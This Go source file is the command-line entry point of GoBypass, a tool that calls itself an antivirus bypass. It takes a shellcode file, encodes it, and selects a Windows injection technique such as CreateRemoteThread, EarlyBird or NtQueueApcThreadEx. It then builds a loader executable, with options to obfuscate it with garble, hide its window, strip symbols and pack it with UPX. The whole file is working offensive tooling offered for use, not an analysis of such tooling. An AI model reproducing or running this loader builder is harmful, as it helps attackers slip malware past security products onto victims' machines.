package main
import (
"flag"
"fmt"
"github.com/EmYiQing/GoBypass/build"
"github.com/EmYiQing/GoBypass/encode"
"github.com/EmYiQing/GoBypass/log"
"github.com/EmYiQing/GoBypass/parser"
"github.com/EmYiQing/GoBypass/tool"
"strings"
)
// Module names accepted by the -m flag. main rejects any value that is not
// one of these, and printHelpInfo lists them in this same order. The values
// are passed unchanged to parser.GetFinalCode; what each one selects is
// decided in that package, not here.
const (
	CreateFiber              = "CreateFiber"
	CreateProcess            = "CreateProcess"
	CreateRemoteThread       = "CreateRemoteThread"
	CreateRemoteThreadNative = "CreateRemoteThreadNative"
	CreateThread             = "CreateThread"
	CreateThreadNative       = "CreateThreadNative"
	CryptProtectMemory       = "CryptProtectMemory"
	CryptUnprotectMemory     = "CryptUnprotectMemory"
	EarlyBird                = "EarlyBird"
	EtwpCreateEtwThread      = "EtwpCreateEtwThread"
	HeapAlloc                = "HeapAlloc"
	NtQueueApcThreadEx       = "NtQueueApcThreadEx"
	RtlCreateUserThread      = "RtlCreateUserThread"
	UuidFromStringA          = "UuidFromStringA"
)
// main is the command-line entry point. It parses the flags, prints the help
// text when -h is given, reads and encodes the file named by -s, rejects an
// empty or unknown -m value, asks parser.GetFinalCode for the final source and
// hands it to build.Build or build.Garble; -u additionally runs tool.StartUpx.
//
// Every flag is registered with an empty usage string, so flag.PrintDefaults
// shows nothing helpful; printHelpInfo is the human-readable reference.
func main() {
	printLogo()

	var (
		moduleName    string
		shellcodePath string
		stripSymbols  bool // -d
		raceDetector  bool // -r
		hideWindow    bool // -w
		packWithUpx   bool // -u
		useGarble     bool // -g
		showHelp      bool // -h
	)
	flag.StringVar(&moduleName, "m", "", "")
	flag.BoolVar(&stripSymbols, "d", false, "")
	flag.BoolVar(&raceDetector, "r", false, "")
	flag.BoolVar(&hideWindow, "w", false, "")
	flag.BoolVar(&packWithUpx, "u", false, "")
	flag.BoolVar(&useGarble, "g", false, "")
	flag.StringVar(&shellcodePath, "s", "shellcode.txt", "")
	flag.BoolVar(&showHelp, "h", false, "")
	flag.Parse()

	if showHelp {
		printHelpInfo()
		return
	}

	// The input file is parsed and encoded before the module name is checked,
	// so an empty or mistyped -m still triggers the parse step; kept as-is to
	// preserve the original order of any errors those calls report.
	encoded := encode.Encode(parser.ParseShellCode(shellcodePath))

	if strings.TrimSpace(moduleName) == "" {
		log.Error("module is null")
		log.Info("see help: go run main.go -h")
		return
	}

	switch moduleName {
	case CreateFiber,
		CreateProcess,
		CreateRemoteThread,
		CreateRemoteThreadNative,
		CreateThread,
		CreateThreadNative,
		CryptProtectMemory,
		CryptUnprotectMemory,
		EarlyBird,
		EtwpCreateEtwThread,
		HeapAlloc,
		NtQueueApcThreadEx,
		RtlCreateUserThread,
		UuidFromStringA:
		// accepted module name
	default:
		log.Error("error module")
		log.Info("see help: go run main.go -h")
		return
	}

	code := parser.GetFinalCode(moduleName, encoded)
	if useGarble {
		build.Garble(code, stripSymbols, hideWindow, raceDetector)
	} else {
		build.Build(code, stripSymbols, hideWindow, raceDetector)
	}
	if packWithUpx {
		tool.StartUpx()
	}
}
// printLogo writes the ASCII-art banner to stdout, one Println of a single
// concatenated literal.
// NOTE(review): the runs of spaces in this literal look collapsed, possibly
// by the page extraction; confirm the exact bytes against the repository
// before editing the banner.
func printLogo() {
	fmt.Println("__________ \n\\" +
		"______ \\___.__.___________ ______ ______\n | | _< " +
		"| |\\____ \\__ \\ / ___// ___/\n | | \\\\___ || |_" +
		"> > __ \\_\\___ \\ \\___ \\ \n |______ // ____|| __(____ /" +
		"____ >____ >\n \\/ \\/ |__| \\/ \\/ " +
		" \\/ ")
}
// printHelpInfo writes the usage text and the list of accepted -m values to
// stdout. It is the only place the flags are described, since main registers
// them with empty usage strings. Each module line is emitted as
// Println("\t", name), i.e. a tab, a separating space and the name.
func printHelpInfo() {
	fmt.Println("A Golang Bypass AntiVirus Tool (coded by 4ra1n)")
	fmt.Println("\nusage: go run main.go -m [MODULE] -u -g")

	optionLines := []string{
		"\t-m : use module (default: null)",
		"\t-d : delete symbol table and debug info (default: false)",
		"\t-r : use race detector (default: false)",
		"\t-w : hide windows gui (default: false)",
		"\t-u : use upx (default: false)",
		"\t-g : build by garble (default: false)",
		"\t-s : shellcode (default: shellcode.txt)",
	}
	for _, line := range optionLines {
		fmt.Println(line)
	}

	fmt.Println("\nmodules:")
	moduleNames := []string{
		CreateFiber,
		CreateProcess,
		CreateRemoteThread,
		CreateRemoteThreadNative,
		CreateThread,
		CreateThreadNative,
		CryptProtectMemory,
		CryptUnprotectMemory,
		EarlyBird,
		EtwpCreateEtwThread,
		HeapAlloc,
		NtQueueApcThreadEx,
		RtlCreateUserThread,
		UuidFromStringA,
	}
	for _, name := range moduleNames {
		fmt.Println("\t", name)
	}
}